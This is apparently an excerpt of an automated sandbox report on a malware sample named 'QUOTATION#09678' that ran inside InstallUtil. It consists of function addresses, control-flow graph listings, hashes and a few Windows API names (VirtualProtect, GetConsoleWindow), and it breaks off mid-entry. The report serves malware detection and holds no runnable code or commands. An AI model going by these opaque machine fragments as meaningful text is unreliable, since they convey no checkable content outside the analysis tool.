1616->1632 1617->1583 1623 7ff848e5c292-7ff848e5c2b2 call 7ff848e58290 1617->1623 1620->1625 1631 7ff848e5c3cf-7ff848e5c3eb 1620->1631 1634 7ff848e5c419 1621->1634 1635 7ff848e5c454-7ff848e5c465 1621->1635 1625->1606 1630->1588 1636 7ff848e5c519-7ff848e5c542 1630->1636 1631->1598 1632->1610 1634->1604 1635->1606
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: {
                                                              • API String ID: 0-328471657
                                                              • Opcode ID: 89bc5942ad71b45cd0b8146672247c281a205bf2c9408e03e845c0f758616f69
                                                              • Instruction ID: 44b067f7e04cc0b5fb01ae01a49533af4a93f81c6738cc7f1add2be270595677
                                                              • Opcode Fuzzy Hash: 89bc5942ad71b45cd0b8146672247c281a205bf2c9408e03e845c0f758616f69
                                                              • Instruction Fuzzy Hash: B8329A71A0CB8A4FE319EB6884614B5B7E1FFD5340F1445BED08AC72A6DF38A846C785
                                                              Function 00007FF848E52FF0 Relevance: 2.0, Strings: 1, Instructions: 734COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1638 7ff848e52ff0-7ff848e55561 call 7ff848e55420 1645 7ff848e55584-7ff848e55593 1638->1645 1646 7ff848e55595-7ff848e555af call 7ff848e55420 call 7ff848e55470 1645->1646 1647 7ff848e55563-7ff848e55579 call 7ff848e55420 call 7ff848e55470 1645->1647 1656 7ff848e5557b-7ff848e55582 1647->1656 1657 7ff848e555b0-7ff848e55600 1647->1657 1656->1645 1661 7ff848e5560c-7ff848e55643 1657->1661 1662 7ff848e55602-7ff848e55607 call 7ff848e54bc8 1657->1662 1665 7ff848e5583f-7ff848e558a9 1661->1665 1666 7ff848e55649-7ff848e55654 1661->1666 1662->1661 1698 7ff848e558ab-7ff848e558b1 1665->1698 1699 7ff848e558c6-7ff848e558f0 1665->1699 1667 7ff848e556c8-7ff848e556cd 1666->1667 1668 7ff848e55656-7ff848e55664 1666->1668 1671 7ff848e556cf-7ff848e556db 1667->1671 1672 7ff848e55740-7ff848e5574a 1667->1672 1668->1665 1670 7ff848e5566a-7ff848e55679 1668->1670 1674 7ff848e556ad-7ff848e556b8 1670->1674 1675 7ff848e5567b-7ff848e556ab 1670->1675 1671->1665 1678 7ff848e556e1-7ff848e556f4 1671->1678 1676 7ff848e5576c-7ff848e55774 1672->1676 1677 7ff848e5574c-7ff848e55759 call 7ff848e54be8 1672->1677 1674->1665 1680 7ff848e556be-7ff848e556c6 1674->1680 1675->1674 1683 7ff848e556f9-7ff848e556fc 1675->1683 1681 7ff848e55777-7ff848e55782 1676->1681 1693 7ff848e5575e-7ff848e5576a 1677->1693 1678->1681 1680->1667 1680->1668 1681->1665 1685 7ff848e55788-7ff848e55798 1681->1685 1686 7ff848e556fe-7ff848e5570e 1683->1686 1687 7ff848e55712-7ff848e5571a 1683->1687 1685->1665 1688 7ff848e5579e-7ff848e557ab 1685->1688 1686->1687 1687->1665 1692 7ff848e55720-7ff848e5573f 1687->1692 1688->1665 1691 7ff848e557b1-7ff848e557d1 1688->1691 1691->1665 1700 7ff848e557d3-7ff848e557e2 1691->1700 1693->1676 1701 7ff848e558f1-7ff848e55945 1698->1701 1702 7ff848e558b3-7ff848e558c4 1698->1702 1704 7ff848e5582d-7ff848e5583e 1700->1704 1705 7ff848e557e4-7ff848e557ef 1700->1705 1713 7ff848e55959-7ff848e55991 1701->1713 1714 7ff848e55947-7ff848e55957 1701->1714 1702->1698 1702->1699 1705->1704 1711 7ff848e557f1-7ff848e55828 call 7ff848e54be8 1705->1711 1711->1704 1720 7ff848e559e8-7ff848e559ef 1713->1720 1721 7ff848e55993-7ff848e55999 1713->1721 1714->1713 1714->1714 1722 7ff848e559f1-7ff848e559f2 1720->1722 1723 7ff848e55a32-7ff848e55a5b 1720->1723 1721->1720 1724 7ff848e5599b-7ff848e5599c 1721->1724 1725 7ff848e559f5-7ff848e559f8 1722->1725 1726 7ff848e5599f-7ff848e559a2 1724->1726 1727 7ff848e55a5c-7ff848e55a71 1725->1727 1728 7ff848e559fa-7ff848e55a0b 1725->1728 1726->1727 1730 7ff848e559a8-7ff848e559b5 1726->1730 1739 7ff848e55a7b-7ff848e55b01 1727->1739 1740 7ff848e55a73-7ff848e55a7a 1727->1740 1731 7ff848e55a0d-7ff848e55a13 1728->1731 1732 7ff848e55a29-7ff848e55a30 1728->1732 1733 7ff848e559b7-7ff848e559de 1730->1733 1734 7ff848e559e1-7ff848e559e6 1730->1734 1731->1727 1735 7ff848e55a15-7ff848e55a25 1731->1735 1732->1723 1732->1725 1733->1734 1734->1720 1734->1726 1735->1732 1740->1739
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 780ca2469974c4e0e1b4e9e41b0c90dac3fb2f23ff5df2c42e56d84a81be7bf9
                                                              • Instruction ID: fe77070c552fee3cd6d0e99a9e11145219f7179d98819d7fd3674410b2f985a0
                                                              • Opcode Fuzzy Hash: 780ca2469974c4e0e1b4e9e41b0c90dac3fb2f23ff5df2c42e56d84a81be7bf9
                                                              • Instruction Fuzzy Hash: 03224471A1CA4A4FE748EB6894815B1B7E0FF85354F1442BAC49EC7197EE38E843C785
                                                              Function 00007FF848E59C08 Relevance: .9, Instructions: 927COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d8504a874db0b028dd1b80da9aaa4427cd077c7c15a1f10431946b13d5a2509
                                                              • Instruction ID: 61afaa3f0bb56c1ea54c5d1a7d20f61edfc758b8bec86530eb33b35e217af633
                                                              • Opcode Fuzzy Hash: 0d8504a874db0b028dd1b80da9aaa4427cd077c7c15a1f10431946b13d5a2509
                                                              • Instruction Fuzzy Hash: 7252C270A1CA0A8FDBA8EB689455A79B7E1FF59341F1401BDE04EC7292DF34EC428745
                                                              Function 00007FF848E59A50 Relevance: .6, Instructions: 621COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb1ab859be535ae36bf155efda10c53086c1aae4bd985589a75bf40d42b8c2ef
                                                              • Instruction ID: 9062a2dd789afa2085adfe2393ec43df3b5c985fe91a69b0f9ac3b0b771ece95
                                                              • Opcode Fuzzy Hash: fb1ab859be535ae36bf155efda10c53086c1aae4bd985589a75bf40d42b8c2ef
                                                              • Instruction Fuzzy Hash: E7024831A1C98A8FE3ACF62C88165757BD0FF99364F5402B9E04DD76A2DB38B8074385
                                                              Function 00007FF848E5C730 Relevance: .4, Instructions: 438COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1724881249e87fd525bdc584e83427bf57727095b33d02b49cef829305f0ebd
                                                              • Instruction ID: a7f01a49ff009e8875f81a102e6200557f8a8c7eebd16f7d7982f272c6e46a64
                                                              • Opcode Fuzzy Hash: d1724881249e87fd525bdc584e83427bf57727095b33d02b49cef829305f0ebd
                                                              • Instruction Fuzzy Hash: 67D1557190CB864FE31DDB2984A5175B7E2FF94301F1486BED4CAC72A6DB38A842C785
                                                              Function 00007FF848E5381A Relevance: 1.6, APIs: 1, Instructions: 143memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1829 7ff848e5381a-7ff848e53827 1830 7ff848e53829-7ff848e53831 1829->1830 1831 7ff848e53832-7ff848e53843 1829->1831 1830->1831 1832 7ff848e5384e-7ff848e53909 VirtualProtect 1831->1832 1833 7ff848e53845-7ff848e5384d 1831->1833 1838 7ff848e5390b 1832->1838 1839 7ff848e53911-7ff848e53942 1832->1839 1833->1832 1838->1839
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: c4b61c66cb1016e1ead21b063eca2e3dc168e2624648a28f62aadd26af69de03
                                                              • Instruction ID: 3d860fa5db5b658beaed76cd9f1fd9b650683e087585e5ccc62511f9f6633c0b
                                                              • Opcode Fuzzy Hash: c4b61c66cb1016e1ead21b063eca2e3dc168e2624648a28f62aadd26af69de03
                                                              • Instruction Fuzzy Hash: C941283190CB884FD7199BA89C466E97BE0EF56321F0442AFD089D3293DB746806C796
                                                              Function 00007FF848E50E65 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1841 7ff848e50e65-7ff848e50e87 1842 7ff848e50e89 1841->1842 1843 7ff848e50e90-7ff848e50f1c FreeConsole 1841->1843 1842->1843 1847 7ff848e50f1e 1843->1847 1848 7ff848e50f24-7ff848e50f4b 1843->1848 1847->1848
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID: ConsoleFree
                                                              • String ID:
                                                              • API String ID: 771614528-0
                                                              • Opcode ID: cae7f7763d54897c0d169e14d70655d0ef5bf336e4175a4629b9a0afec47de60
                                                              • Instruction ID: e1c5b824677391c1d07e5ca0f33052141c19c049613c0e0eecb20b7d6ad2e1ba
                                                              • Opcode Fuzzy Hash: cae7f7763d54897c0d169e14d70655d0ef5bf336e4175a4629b9a0afec47de60
                                                              • Instruction Fuzzy Hash: B731E23090DB888FDB1AEB689845AE97FF0EB56320F0441AFE089C7163C6746449CB52
                                                              Function 00007FF848F210C9 Relevance: .3, Instructions: 262COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271442076.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848f20000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb5fd9780b0e4634367cb7c0921da9e7d0d9031932ccaecaf855e20516fe49ad
                                                              • Instruction ID: 192c6559352e65e66cb1d1c797ddde8de5a0fd3d6a40f80c3d43a96ef5205a50
                                                              • Opcode Fuzzy Hash: fb5fd9780b0e4634367cb7c0921da9e7d0d9031932ccaecaf855e20516fe49ad
                                                              • Instruction Fuzzy Hash: E3715331D0DAC94FEB56EB68A8255A47BE1EF56340F0900FBD04AC71D3DA2ABC45C389

                                                              Non-executed Functions

                                                              Function 00007FF848E6BEA0 Relevance: .9, Instructions: 928COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aebae091bf43286edcce03230888e795ce89be3372321f29dfb32a207dd01c1b
                                                              • Instruction ID: 3a4e47d93c2b9184aea10dd7b408c603c53d8a2020915c1585b6f77379e6cf37
                                                              • Opcode Fuzzy Hash: aebae091bf43286edcce03230888e795ce89be3372321f29dfb32a207dd01c1b
                                                              • Instruction Fuzzy Hash: A412683190DA9A8FE359EB28C8810B17BD1FF91354F5445BAC48AD71A3DF39B886C784
                                                              Function 00007FF848E511F2 Relevance: .1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2271233174.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff848e50000_QUOTATION#09678.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33f564ab55fd22f2a152967b851cd23da9bbc9611464877ae6251fd69e3f163b
                                                              • Instruction ID: ff9c2c876a09d9475d504dc930e94f13edde1b79560a3ec9be05a6bbd7d67788
                                                              • Opcode Fuzzy Hash: 33f564ab55fd22f2a152967b851cd23da9bbc9611464877ae6251fd69e3f163b
                                                              • Instruction Fuzzy Hash: 2C31C7A7A8D8227DA70DBABDF8454F97704EF85375B09957BD1C8CD0539A04208B8AF8

                                                              Execution Graph

                                                              Execution Coverage:13.3%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:17
                                                              Total number of Limit Nodes:0
                                                              execution_graph 16320 1600871 16321 160087c 16320->16321 16325 16008c8 16321->16325 16330 16008d8 16321->16330 16322 1600889 16326 16008d0 16325->16326 16335 1600ce0 16326->16335 16339 1600ce8 16326->16339 16327 160093e 16327->16322 16331 16008fa 16330->16331 16333 1600ce0 GetConsoleWindow 16331->16333 16334 1600ce8 GetConsoleWindow 16331->16334 16332 160093e 16332->16322 16333->16332 16334->16332 16336 1600ce4 GetConsoleWindow 16335->16336 16338 1600d56 16336->16338 16338->16327 16340 1600d26 GetConsoleWindow 16339->16340 16342 1600d56 16340->16342 16342->16327

                                                              Executed Functions

                                                              Function 01600CE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 864 1600ce0-1600ce2 865 1600ce4 864->865 866 1600ce5-1600d54 GetConsoleWindow 864->866 865->866 869 1600d56-1600d5c 866->869 870 1600d5d-1600d82 866->870 869->870
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2386662868.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWindow
                                                              • String ID:
                                                              • API String ID: 2863861424-0
                                                              • Opcode ID: d6358634628098f41b7cdd6911cecdc888204178860854e6d448653eab7333f0
                                                              • Instruction ID: f92ba0631e6457aba12cb4eae8790ec9174dc6330a4a4e19f0cf321e154ba718
                                                              • Opcode Fuzzy Hash: d6358634628098f41b7cdd6911cecdc888204178860854e6d448653eab7333f0
                                                              • Instruction Fuzzy Hash: 97113771D002488FCB24DFAAC8557EFBBF5AF49314F20841AD419A7240C739A544CFA0
                                                              Function 01600CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 874 1600ce8-1600d54 GetConsoleWindow 877 1600d56-1600d5c 874->877 878 1600d5d-1600d82 874->878 877->878
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2386662868.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_1600000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWindow
                                                              • String ID:
                                                              • API String ID: 2863861424-0
                                                              • Opcode ID: 9daed437659a43be177efa008236f91e182d14722feaf87f1a63959104314823
                                                              • Instruction ID: f9424bb751f9971271a37a9e5ea1d33eca2069a477402ddec64ade58fb8608d6
                                                              • Opcode Fuzzy Hash: 9daed437659a43be177efa008236f91e182d14722feaf87f1a63959104314823
                                                              • Instruction Fuzzy Hash: 5D11F5B59002498FDB24DFAAC4457DFFBF5EB48314F208419D519A7240CB79A544CFA1
                                                              Function 06771550 Relevance: 1.4, Instructions: 1411COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 969 6771550-6771573 970 6771575-6771577 969->970 971 6771581-67715d7 969->971 970->971 975 67719a7-67719be 971->975 976 67715dd-677160d 971->976 979 67719c6-67719f9 975->979 980 67719c0-67719c4 975->980 976->975 984 6771613-6771643 976->984 981 6771a11-6771a6c 979->981 982 67719fb-6771a01 979->982 980->979 1000 67727b2-67727f8 981->1000 1001 6771a72-6771a87 981->1001 985 6771a05-6771a0f 982->985 986 6771a03 982->986 984->975 992 6771649-6771679 984->992 985->981 986->981 992->975 998 677167f-67716af 992->998 998->975 1008 67716b5-67716e5 998->1008 1009 6772810-6772888 1000->1009 1010 67727fa-6772800 1000->1010 1001->1000 1007 6771a8d-6771abe 1001->1007 1021 6771ac0-6771ad6 1007->1021 1022 6771ad8-6771b24 1007->1022 1008->975 1019 67716eb-677171b 1008->1019 1036 67728b2-67728b9 1009->1036 1037 677288a-67728b0 1009->1037 1012 6772804-677280e 1010->1012 1013 6772802 1010->1013 1012->1009 1013->1009 1019->975 1032 6771721-6771751 1019->1032 1031 6771b2b-6771b48 1021->1031 1022->1031 1031->1000 1039 6771b4e-6771b80 1031->1039 1032->975 1044 6771757-6771787 1032->1044 1037->1036 1048 6771b82-6771b98 1039->1048 1049 6771b9a-6771be6 1039->1049 1044->975 1051 677178d-67717bd 1044->1051 1057 6771bed-6771c0a 1048->1057 1049->1057 1051->975 1061 67717c3-67717da 1051->1061 1057->1000 1063 6771c10-6771c42 1057->1063 1061->975 1066 67717e0-677180c 1061->1066 1069 6771c44-6771c5a 1063->1069 1070 6771c5c-6771ca8 1063->1070 1072 6771836-6771878 1066->1072 1073 677180e-6771834 1066->1073 1080 6771caf-6771ccc 1069->1080 1070->1080 1092 6771896-67718a2 1072->1092 1093 677187a-6771890 1072->1093 1089 67718a8-67718d5 1073->1089 1080->1000 1088 6771cd2-6771d04 1080->1088 1096 6771d06-6771d1c 1088->1096 1097 6771d1e-6771d6a 1088->1097 1089->975 1099 67718db-677190f 1089->1099 1092->1089 1093->1092 1105 6771d71-6771d8e 1096->1105 1097->1105 1099->975 1108 6771915-6771958 1099->1108 1105->1000 1112 6771d94-6771dc6 1105->1112 1108->975 1121 677195a-677198a 1108->1121 1117 6771de0-6771e38 1112->1117 1118 6771dc8-6771dde 1112->1118 1126 6771e3f-6771e5c 1117->1126 1118->1126 1121->975 1130 677198c-67719a4 1121->1130 1126->1000 1132 6771e62-6771e94 1126->1132 1136 6771e96-6771eac 1132->1136 1137 6771eae-6771f0c 1132->1137 1142 6771f13-6771f30 1136->1142 1137->1142 1142->1000 1145 6771f36-6771f68 1142->1145 1149 6771f82-6771fe0 1145->1149 1150 6771f6a-6771f80 1145->1150 1155 6771fe7-6772004 1149->1155 1150->1155 1155->1000 1159 677200a-677203c 1155->1159 1162 6772056-67720b4 1159->1162 1163 677203e-6772054 1159->1163 1168 67720bb-67720d8 1162->1168 1163->1168 1168->1000 1171 67720de-6772110 1168->1171 1175 6772112-6772128 1171->1175 1176 677212a-6772188 1171->1176 1181 677218f-67721ac 1175->1181 1176->1181 1181->1000 1185 67721b2-67721c7 1181->1185 1185->1000 1187 67721cd-67721fe 1185->1187 1190 6772200-6772216 1187->1190 1191 6772218-6772276 1187->1191 1196 677227d-677229a 1190->1196 1191->1196 1196->1000 1199 67722a0-67722d2 1196->1199 1203 67722d4-67722ea 1199->1203 1204 67722ec-677234a 1199->1204 1209 6772351-677236e 1203->1209 1204->1209 1209->1000 1213 6772374-67723a6 1209->1213 1216 67723c0-677241e 1213->1216 1217 67723a8-67723be 1213->1217 1222 6772425-6772442 1216->1222 1217->1222 1222->1000 1225 6772448-677247a 1222->1225 1229 6772494-67724f2 1225->1229 1230 677247c-6772492 1225->1230 1235 67724f9-6772516 1229->1235 1230->1235 1235->1000 1239 677251c-6772531 1235->1239 1239->1000 1241 6772537-6772568 1239->1241 1244 6772582-67725e0 1241->1244 1245 677256a-6772580 1241->1245 1250 67725e7-6772604 1244->1250 1245->1250 1250->1000 1253 677260a-677261f 1250->1253 1253->1000 1256 6772625-6772656 1253->1256 1259 6772670-67726ce 1256->1259 1260 6772658-677266e 1256->1260 1265 67726d5-67726f2 1259->1265 1260->1265 1265->1000 1269 67726f8-6772724 1265->1269 1272 6772726-677273c 1269->1272 1273 677273e-6772793 1269->1273 1278 677279a-67727af 1272->1278 1273->1278
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb21413ac1cc85b79462277fddb218c9508ce5209fc0d84fb47d649af3cfc1b0
                                                              • Instruction ID: 081bad976e67c2582cb568c3e0eaa62868e5ff2e3957c5975316b7e99212f164
                                                              • Opcode Fuzzy Hash: bb21413ac1cc85b79462277fddb218c9508ce5209fc0d84fb47d649af3cfc1b0
                                                              • Instruction Fuzzy Hash: BBC26E34B102189FCB14DF58C991EADBBB6FF88700F108099E659AB361DB71AE45CF61
                                                              Function 0677349D Relevance: 1.3, Instructions: 1286COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1379 677349d-6773526 1387 677352c-677355d 1379->1387 1390 677355f-6773578 1387->1390 1391 677357b-6773598 1387->1391 1394 67735fb-6773627 1391->1394 1395 677359a 1391->1395 1403 677363f-6773661 1394->1403 1404 6773629-677362f 1394->1404 1396 67735a2-67735c7 1395->1396 1397 677359c-677359f 1395->1397 1400 67736d6-6773706 1396->1400 1401 67735cd-67735df 1396->1401 1397->1396 1418 677370c-677371b 1400->1418 1419 6773798-67737a3 1400->1419 1409 67735e1-67735f0 1401->1409 1417 67736a7-67736ae 1403->1417 1407 6773633-6773635 1404->1407 1408 6773631 1404->1408 1407->1403 1408->1403 1415 6773663-6773667 1409->1415 1416 67735f2-67735f4 1409->1416 1421 6773676 1415->1421 1422 6773669-6773674 1415->1422 1416->1394 1417->1409 1420 67736b4-67736d1 1417->1420 1429 677371d-6773746 1418->1429 1430 677376b-677376f 1418->1430 1428 67737ab-67737b5 1419->1428 1420->1428 1423 677367b-677367e 1421->1423 1422->1423 1423->1420 1427 6773680-6773684 1423->1427 1431 6773686-6773691 1427->1431 1432 6773693 1427->1432 1450 677375e-6773769 1429->1450 1451 6773748-677374e 1429->1451 1434 6773771-677377c 1430->1434 1435 677377e 1430->1435 1433 6773695-6773697 1431->1433 1432->1433 1437 677369d-67736a6 1433->1437 1438 67737b8-67737c5 1433->1438 1439 6773780-6773782 1434->1439 1435->1439 1437->1417 1444 67737cc-67737ea 1438->1444 1443 6773784-677378d 1439->1443 1439->1444 1452 677378e-6773792 1443->1452 1450->1452 1453 6773752-6773754 1451->1453 1454 6773750 1451->1454 1452->1418 1452->1419 1453->1450 1454->1450
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 372b5a6da72e7f63e2048299916058a1489563d3139d5a93e5ac90443f4225bc
                                                              • Instruction ID: d43221ffcdb9a074a5b946f361cb2a3cfa89210c8d1afa37497e7b7a7b91b971
                                                              • Opcode Fuzzy Hash: 372b5a6da72e7f63e2048299916058a1489563d3139d5a93e5ac90443f4225bc
                                                              • Instruction Fuzzy Hash: F8A1BF74B002459FCF448B68C994ABEBBF6FF89310B10846AE516DB3A1DB34DC05DBA1
                                                              Function 06770048 Relevance: .7, Instructions: 664COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1730 6770048-677006e 1733 6770086-67700a4 1730->1733 1734 6770070-6770076 1730->1734 1739 67700ab-67700b8 1733->1739 1735 677007a-677007c 1734->1735 1736 6770078 1734->1736 1735->1733 1736->1733 1741 6770734-677073d 1739->1741 1742 67700be-67700d5 1739->1742 1742->1739 1744 67700d7 1742->1744 1745 6770144-67701a7 1744->1745 1746 6770384-67703a7 1744->1746 1747 6770222-6770250 1744->1747 1748 6770470-677049e 1744->1748 1749 67700de-6770104 1744->1749 1750 677030e-6770331 1744->1750 1751 67701ac-67701cf 1744->1751 1752 67703fa-6770428 1744->1752 1753 6770298-67702bb 1744->1753 1745->1739 1791 6770926-6770955 1746->1791 1792 67703ad-67703b1 1746->1792 1774 6770252-6770258 1747->1774 1775 6770268-6770293 1747->1775 1776 67704b6-67704e1 1748->1776 1777 67704a0-67704a6 1748->1777 1766 677010a-677013f 1749->1766 1798 6770337-677033b 1750->1798 1799 6770884-67708b3 1750->1799 1795 67701d5-67701d9 1751->1795 1796 6770740-677076f 1751->1796 1772 6770440-677046b 1752->1772 1773 677042a-6770430 1752->1773 1793 67707e2-6770811 1753->1793 1794 67702c1-67702c5 1753->1794 1766->1739 1772->1739 1778 6770434-6770436 1773->1778 1779 6770432 1773->1779 1785 677025c-677025e 1774->1785 1786 677025a 1774->1786 1775->1739 1776->1739 1787 67704aa-67704ac 1777->1787 1788 67704a8 1777->1788 1778->1772 1779->1772 1785->1775 1786->1775 1787->1776 1788->1776 1815 677095c-677098b 1791->1815 1802 67703b7-67703c1 1792->1802 1803 6770992-6770cf9 1792->1803 1817 6770818-6770847 1793->1817 1804 677084e-677087d 1794->1804 1805 67702cb-67702d5 1794->1805 1806 67701df-67701e9 1795->1806 1807 67707ac-67707db 1795->1807 1819 6770776-67707a5 1796->1819 1808 6770341-677034b 1798->1808 1809 67708f0-677091f 1798->1809 1824 67708ba-67708e9 1799->1824 1814 67703c7-67703f5 1802->1814 1802->1815 1804->1799 1816 67702db-6770309 1805->1816 1805->1817 1806->1819 1820 67701ef-677021d 1806->1820 1807->1793 1823 6770351-677037f 1808->1823 1808->1824 1809->1791 1814->1739 1815->1803 1816->1739 1817->1804 1819->1807 1820->1739 1823->1739 1824->1809
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2393593003.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6770000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1e990a23aa7d83d1647ef621a0c7b33c23c12dce7f92b915d1bd3098ddc04663
                                                              • Instruction ID: 38f55281a7997324f59f19b2a184fb68bd778c0705b8c6e8aa1b7f2a8f7cafb3
                                                              • Opcode Fuzzy Hash: 1e990a23aa7d83d1647ef621a0c7b33c23c12dce7f92b915d1bd3098ddc04663
                                                              • Instruction Fuzzy Hash: 254268707406158FCB659F68E45096EBAB6FFC2310B014A6CD5039F7A4CB7AED098B86
                                                              Function 067704F4 Relevance: .5, Instructions: 499COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
